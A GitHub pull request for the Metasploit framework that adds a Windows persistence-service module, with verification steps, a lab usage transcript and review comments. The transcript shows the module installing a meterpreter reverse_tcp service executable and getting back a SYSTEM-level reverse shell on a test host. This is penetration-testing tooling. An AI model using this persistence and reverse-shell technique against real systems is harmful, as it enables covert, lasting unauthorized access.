New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit module windows persistent service #11123

Merged
merged 23 commits into from Dec 17, 2018

Conversation

Projects
None yet
3 participants
@jrobles-r7
Copy link
Contributor

jrobles-r7 commented Dec 14, 2018

Github was showing #10822 as 200+ commits and 100+ files changed. Opening in new PR so it is shown correctly.

Note: This PR rely on #10821, please merge that before merge this. Could be merged now.

resolved #10385

Verification steps

  • get session on target
  • use post/windows/manage/persistence_service
  • set payload <payload>
  • set lport <lport>
  • set lhost <lhost>
  • set handler true
  • run

Usage

msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options

Module options (post/windows/manage/persistence_service):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  true                             no        Start an exploit/multi/handler to receive the connection
   LHOST    192.168.56.1                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        The payload to use in the service.
   SESSION  1                                yes       The session to run this module on.
msf5 post(windows/manage/persistence_service) > run

[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  test-PC\test @ TEST-PC         192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-PC  192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)

msf5 post(windows/manage/persistence_service) >

Enjoy it!

Green-m and others added some commits Oct 17, 2018

@jrobles-r7 jrobles-r7 changed the title Feature/win service Add exploit module windows persistent service Dec 14, 2018

@Green-m Green-m added the msf5 label Dec 14, 2018

@Green-m

This comment has been minimized.

Copy link
Contributor

Green-m commented Dec 14, 2018

Should be only valid for msf5 on account of the metasm compiler feature.

@jrobles-r7 jrobles-r7 self-assigned this Dec 14, 2018

@jrobles-r7 jrobles-r7 added the feature label Dec 14, 2018

jrobles-r7 and others added some commits Dec 14, 2018

@jrobles-r7
Copy link
Contributor

jrobles-r7 left a comment

Some changes are needed to handle paths with spaces.
In the C code, the logic for checking the install/start service can be changed for comparing against the last provided argument, argv[argc-1]. Using the last argument will let us keep the strtok logic that is currently in the code and let us handle paths with spaces.

Show resolved Hide resolved modules/exploits/windows/local/persistence_service.rb Outdated

Green-m and others added some commits Dec 17, 2018

Merge pull request #6 from jrobles-r7/patch/service_space
Fix additional path space issues

@jrobles-r7 jrobles-r7 merged commit cb0cde3 into rapid7:master Dec 17, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Dec 17, 2018

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Dec 17, 2018

Release Notes

The exploit/windows/local/persistence_service module can be used to create a Windows service for persistence.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Dec 17, 2018

Thanks @Green-m !

@Green-m

This comment has been minimized.

Copy link
Contributor

Green-m commented Dec 17, 2018

@Green-m Green-m deleted the Green-m:feature/win_service branch Dec 18, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment